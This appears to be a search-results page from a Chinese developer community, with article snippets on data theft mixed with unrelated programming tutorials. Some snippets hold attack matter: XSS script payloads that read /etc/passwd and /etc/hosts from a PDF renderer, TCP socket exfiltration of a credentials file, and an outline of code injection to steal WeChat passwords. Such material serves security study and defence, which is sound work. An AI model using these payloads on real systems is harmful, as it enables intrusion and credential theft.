- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全
攻防实战:数据窃取技术详解
一、概述(Overview)数据窃取是指未经授权地、隐蔽地将敏感数据从受控的内部网络复制并转移到攻击者控制的外部位置的过程。 网络犯罪分子攻击公司的目的各异,但多数情况下最终目标是数据泄露,即将窃取的敏感数据在暗网出售或公开。 通常涉及持续的数据发送和接收。三、基于常见网络协议的数据窃取技术#####A.TCP套接字窃取(TCPSocketExfiltration)原理与适用场景:直接利用TCP套接字建立连接并传输数据。 -`>/tmp/task4-creds.data`:将接收到的数据重定向到文件。2.**受害者机器(victim1)准备并发送数据**:假设数据在`task4/creds.txt`。 DNS数据窃取(DNSDataExfiltration)DNS数据窃取是一种将敏感数据编码后,通过一系列DNS查询发送到攻击者控制的DNS服务器的网络攻击。
56541编辑于 2025-12-31 - 来自专栏数据湖
数据仓库实战 4
20/11/25 11:08:25 INFO mapreduce.Job: Job job_1606125802436_0010 completed successfully ODS层 完全仿照业务数据库中的表字段 COMMENT '支付流水表' PARTITIONED BY ( `dt` string) row format delimited fields terminated by '\t' ; ODS层数据导入脚本 do_date' OVERWRITE into table "$APP".ods_base_category3 partition(dt='$do_date'); " hive -e "$sql" 执行脚本导入数据 ', `create_time` string COMMENT '' ) PARTITIONED BY ( `dt` string) stored as parquet; DWD层数据导入脚本 查看mysql数据 MariaDB [gmall]> select * from ads_gmv_sum_day; +------------+-----------+------------+-
1.7K41发布于 2020-12-18 - 来自专栏Khan安全团队
XSS 从 PDF 中窃取数据
<script>x=newXMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
33910编辑于 2025-04-28 - 来自专栏安恒信息
三星S4被指存在严重漏洞,通讯数据可能被窃取
以色列本古里安大学(Ben-Gurion University of the Negev)的网络安全研究人员发现,三星电子畅销智能手机Galaxy S4的安全平台存在一个安全漏洞,可能会让恶意软件追踪邮件并记录数据通讯 研究人员称,该漏洞可以让黑客“轻松拦截”使用Knox平台的Galaxy智能手机用户的加密数据。他指出,黑客可以修改数据,甚至插入恶意代码,从而在安全防护的网络内“胡作非为”。 该大学实验室的首席技术官DuduMimran在一份声明中表示,“新发现的漏洞代表了一种严重的威胁,受影响的用户包括所有使用基于这种架构的手机的用户,例如三星Galaxy S4用户”。 Knox并没有预装在GalaxyS4设备上,不过任何用户都可以下载该系统。Knox程序预装在GalaxyNote 3上。用户可以自主关闭该系统。 以色列的研究人员称,他们只是在Galaxy S4上发现该问题。
57560发布于 2018-04-10 - 来自专栏iOS开发干货分享
iOS逆向(4)-代码注入,非越狱窃取微信密码
Step 4 将FYHook标记入MachO中 这里我们就需要用到终端命令行工具:yololib 提取码:e8qs 将下载下来的yololib.zip解压后得到的yololib放在目录/usr/local Step 4 重新打包WeChat.ipa zip -ry WeChat.ipa Payload ? 4、 ViewDebug、LLDB、class-dump分析微信登录页面 Step 1 ViewDebug XCode跑起微信之后,跳转到登录页面,利用ViewDebug查看具体的详细的UI ? Step 4 找到输入框里面的内容 利用文本工具,例如Sublime查看WeChat的头文件,找到前面发现的 WCAccountMainLoginViewController ? 系列干货持续更新中(记得关注我哦): iOS逆向(1)-密码学(RSA) iOS逆向(2)-密码学(Hash&对称加密) iOS逆向(3)-APP重签名 iOS逆向(4)-代码注入,非越狱窃取微信密码
2.9K10发布于 2019-06-14 - 来自专栏FreeBuf
包括美国前总统特朗普,攻击者窃取Twitter 4亿数据并出售
据Security Affairs消息,一名攻击者声称已窃取Twitter 4亿用户数据,并将其挂在地下论坛出售。 目前尚无媒体或安全机构进一步核实这名攻击者的说法及这4亿用户数据的保真性。 监管机构已就上个月的数据泄露展开调查 在上个月的540万Twitter 用户数据泄露事件发生后,爱尔兰数据保护委员会 (DPC) 已就此展开调查,在12月23日发表的一份声明中,DCP表示已就此事与Twitter 作为 Twitter 在欧盟的主要监管机构,DPC 希望确定这家社交媒体巨头是否履行了其作为数据控制者在处理用户数据方面的义务,以及它是否违反了《通用数据保护条例》(EU GDPR) 的任何规定或 2018 年制定的数据保护法。
42420编辑于 2023-02-10 - 来自专栏大前端666
Vue实战系列—项目数据交互-axios(4)
生命周期:https://cn.vuejs.org/v2/guide/instance.html created 的时候 发起异步请求获取数据 3.3 怎么用 数据从哪里来: 1.美团API接口 , 优点:贴近工作情形 缺点:官方接口申请有门槛,手续繁琐,限制多,速度慢,非官方不稳定,容易失效 2.自己搭建线上服务器数据 优点:贴近工作情形,自己造数据想怎玩怎么玩 缺点:写JSON 麻烦,不稳定,速度慢,域名空间收费,繁琐 3.搭建本地模拟数据 优点:贴近工作情形,自己造数据想怎玩怎么玩,访问速度快,稳定 缺点:写JSON、配置服务器麻烦(如使用express或者mockjs response); }) .catch(function (error) { console.log(error); }); 总 结 本文我们从安装,到axios,让我们对vue的数据相关的技术点有了一定了解 下篇:我们通过为项目header组件添加数据交互功能,敬请关注。
83710发布于 2019-06-19 - 来自专栏前端加油站
angular4实战(4)ngrx
ngrx主要有四个模块,分别是 ngrx/store, ngrx/effects, ngrx/router-store, ngrx/store-devtools 本次实例用的是ngrx 4. 比如{name:j_bleach}=>{name:bleach} 或者输入属性为一个数组的时候[1,2,3]=>[1,2,3].push(4) 以上这两种方式都不会引发angular的检查策略 (前提是在元数据中设置了changeDetection: ChangeDetectionStrategy.OnPush) 在此设置基础下,想要启动策略,就需要返回新的对象和数组。 如Object.assign({}, {name:j_bleach}, {name:bleach}); 或者[…[1,2,3],4]这样返回一个新的对象。 项目地址:https://github.com/jiwenjiang/angular4-material2
2.4K30发布于 2019-07-02 - 来自专栏FreeBuf
防范数据窃取从了解其手法做起
数据窃取是针对组织攻击链中的最后一个阶段。攻击者窃取数据的技术可谓花样百出,网上也有大量关于数据窃取方面的技术文档以及工具。 工欲善其事必先利其器,防范数据窃取必须先熟悉其使用的手段。文中所提及的大多数技术涉及直接的内部到外部数据窃取。需要说明的是这并不是一个完整版本,如果你知道的更多,那么请在评论处留言并告知我们! Anon paste站点例如pastebin甚至是github,都为我们提供了一个数据窃取的简易通道。许多技术组织通常都会允许Github的使用。 X509证书可以被嵌入到二进制数据中,因此可用于传输数据。 www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/ 磁:ODINI和MAGNETO攻击可以利用计算机处理器产生的磁信号来窃取数据
73530发布于 2018-08-21 - 来自专栏安恒网络空间安全讲武堂
用css绕过同源策略跨域窃取数据
font-family属性的值,即单引号内的,所 以这也将成为一个前置条件,那就是要窃取的数据中不能同时出现单双引号。 最后我们就 可以通过这样的方式完成跨域窃取敏感信息,数据甚至可能包含csrf所需的token,或者更敏感的个人信息。 攻击的一些前提约束 要窃取的数据必须在payload1和payload2之间。 要窃取的数据不能同时存在单引号和双引号,否则会破坏解析的结构。 (数据最后要被解析为css一个属性的值) 要窃取的数据不能包含换行符(css值不支持多行) 这些条件在现代的编码风格下是很难遇到,尤其是不允许出现换行。 我们需要一个可以写任意字符串的属性,这样才能导入我们要窃取的数据。”font-family”是最佳的选择。
1.5K90发布于 2018-02-06 - 来自专栏网络安全
DeepSeek 恶意 Python 包,正在窃取你的数据
研究人员发现,Python 软件包索引(PyPi)中植入了恶意的、模仿 DeepSeek 的软件包,这些代码实际上携带着信息窃取程序。 研究人员指出,“deepseeek” 和 “deepseekai” 在执行时会释放信息窃取程序,以窃取敏感数据,包括 API 密钥、数据库凭证和权限。
51910编辑于 2025-02-06 - 来自专栏文大师的新世界
4. Navigation实战
本来想写一个应用redux的Navigation实战,但是发现react-native有又新的更新,新手怕误导大家,就直接用了别人的组件,看看怎么应用吧。 QQ图片20160622205143.jpg 4.
1.1K20发布于 2018-08-30 - 来自专栏Python数据科学
Python数据分析实战基础 | 清洗常用4板斧
☞500g+超全学习资源免费领取 这是Python数据分析实战基础的第三篇内容,主要对前两篇进行补充,把实际数据清洗场景下常用但零散的方法,按增、删、查、分四板斧的逻辑进行归类,以减少记忆成本,提升学习和使用效率 01 增——拓展数据维度 1.1 纵向合并 这三个sheet的数据,维度完全一致(每列数据都是一样),纵向合并起来分析十分方便。 1.2 横向合并 横向合并涉及到连接问题,为方便理解,我们构造一些更有代表性的数据集练手: 两个DataFrame是两张成绩表,h1是5位同学的数学、英语、语文成绩,h2是4位同学的篮球和舞蹈成绩,现在想找到并合并两张表同时出现的同学及其成绩 2.2 去重 说是讲去重,但是案例数据比较干净,没有两行数据是完全一样的,所以我们要制造点困难,增加几行重复值: 把源数据重复两遍,赋值给repeat,这样每一行数据都有重复的数据。 继续展开讲,在源数据中,流量渠道为“一级”的有7行数据,每行数据其他字段都不相同,这里我们删除了后6行,只保留了第一行,但如果我们想在去重的过程中删除前面6行,保留最后一行数据怎么操作?
2.6K21发布于 2019-11-21 - 来自专栏大数据文摘
“窃取用户数据”?看阿里如何应对
支付宝与付费通终止合作后,网上突然出现很多支付宝“窃取用户数据”的言论。商务合作终止固然遗憾,但“盗窃”的罪名更重大,尤其是涉及到大家非常关注的数据问题。 毫无疑问我们非常看重数据,数据将会成为改善全社会商业环境的重要资源,我们坚信数据的力量和价值。阿里巴巴从五年前就确定“开放的数据平台”作为自己的战略目标,并且重兵布局云计算和大数据。 如何有效地发挥这些数据的价值,建立一种数据交换以及数据标准的能力,我们的思考才刚刚开始。 ,数据分享后要完成回流、增值、再沉淀的过程,使得分享和交换的双方共同受益 (4)价值可衡量原则,在数据合作前一定会制定客观的价值评估体系,确保数据合作公正和公平。 4、大数据是无数用户的个体数据积累起来的,但看起来运用和发挥数据价值似乎变成了大机构的专利。这其中如何具体保护客户的隐私和利益?大数据对于每个人的价值又在哪里?
69950发布于 2018-05-21 - 来自专栏火绒安全
AgentTesla病毒解析:利用钓鱼邮件窃取终端隐私数据
当用户被诱导点击运行病毒后,病毒即会窃取用户终端上的隐私数据并上传C&C服务器。 ͼƬ2.png AgentTesla病毒样本通常使用混淆器,通过数据加密、代码加密、控制流混淆等多种混淆方式藏匿自身病毒特征,对抗安全软件查杀。 AgentTesla病毒的主要危害是窃取用户终端中的隐私数据,隐私数据包括用户浏览器登录凭证、FTP软件登录凭证、电子邮件登录凭证、键盘记录信息、屏幕截图、用户系统配置信息等。
73620编辑于 2022-05-20 - 来自专栏python前行者
《python数据分析与挖掘实战》笔记第4章
文章目录 第4章:数据预处理 4.1、数据清洗 4.1.1、缺失值处理 4.1.1、异常值处理 4.2、数据集成 4.2.1、实体识别 4.2.2、冗余属性识别 4.3、数据变换 4.3.1、 4.6、小结 第4章:数据预处理 数据预处理一方面是要提高数据的质量,另一方面是要让 数据更好地适应特定的挖掘技术或工具。 异常值处理常用方法见表4-3。 代码清单4-3数据离散化 #-*- coding: utf-8 -*- #数据规范化 import pandas as pd datafile = '.. 4个主要任务:数据清洗、数据集成、数据变换和数据规约。
1.9K20发布于 2021-03-03 - 来自专栏KisFlow-Golang流式计算框架
Golang框架实战-KisFlow流式计算框架(4)-数据流
创建一个KisFlow对象flow1 := flow.NewKisFlow(myFlowConfig1)// 4. This is Data2 from Test This is Data3 from Test]]KisFunctionC, flow = &{Id:flow-8b607ae6d55048408dae1f4e8f6dca6f KisFunctionC, index 1 Data From KisFunctionC, index 2]]KisFunctionE, flow = &{Id:flow-8b607ae6d55048408dae1f4e8f6dca6f 0 readerSem:0 readerCount:0 readerWait:0} ThisFunction:0xc0001381e0 ThisFunctionId:func-2182fa1a049f4c1c9eeb641f5292f09f PrevFunctionId:func-f3e7d7868f44448fb532935768ea2ca1 funcParams:map[func-2182fa1a049f4c1c9eeb641f5292f09f
47110编辑于 2024-04-23 - 来自专栏IMWeb前端团队
Angular4 实战开发
本文作者:IMWeb 郭明慧 原文出处:IMWeb社区 未经同意,禁止转载 《Angular 实战系列》目前处于章节不定,内容不定阶段,这一系列文章不会长篇大论的讲解概念,而是以用为主,结合通俗易懂的实例来让大家理解常用的知识点
83520发布于 2019-12-06 - 来自专栏IMWeb前端团队
Angular4 实战开发
本文作者:IMWeb 郭明慧 原文出处:IMWeb社区 未经同意,禁止转载 《Angular 实战系列》目前处于章节不定,内容不定阶段,这一系列文章不会长篇大论的讲解概念,而是以用为主,结合通俗易懂的实例来让大家理解常用的知识点 原文链接:Angular4 实战开发
994100发布于 2018-01-08 - 来自专栏EdisonTalk
MongoDB入门实战教程(4)
首先,我们来看看如何插入新数据,MongoDB为我们提供了插入单个和多个文档的接口。 插入单个文档:db. 查询所有数据:db. 查询带条件的数据:db. Korean","code": "KO", "market": "South Korea"} }}); 此外,还可以使用pushAll即可增加多个对象到数组底部,使用pop来从数组底部删除一个对象,使用 4 可以使用 db.dropDatabase() 来删除数据库,需要注意的是 数据库响应文件也会被删除,磁盘空间会得到释放。
3.2K30发布于 2021-06-17
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号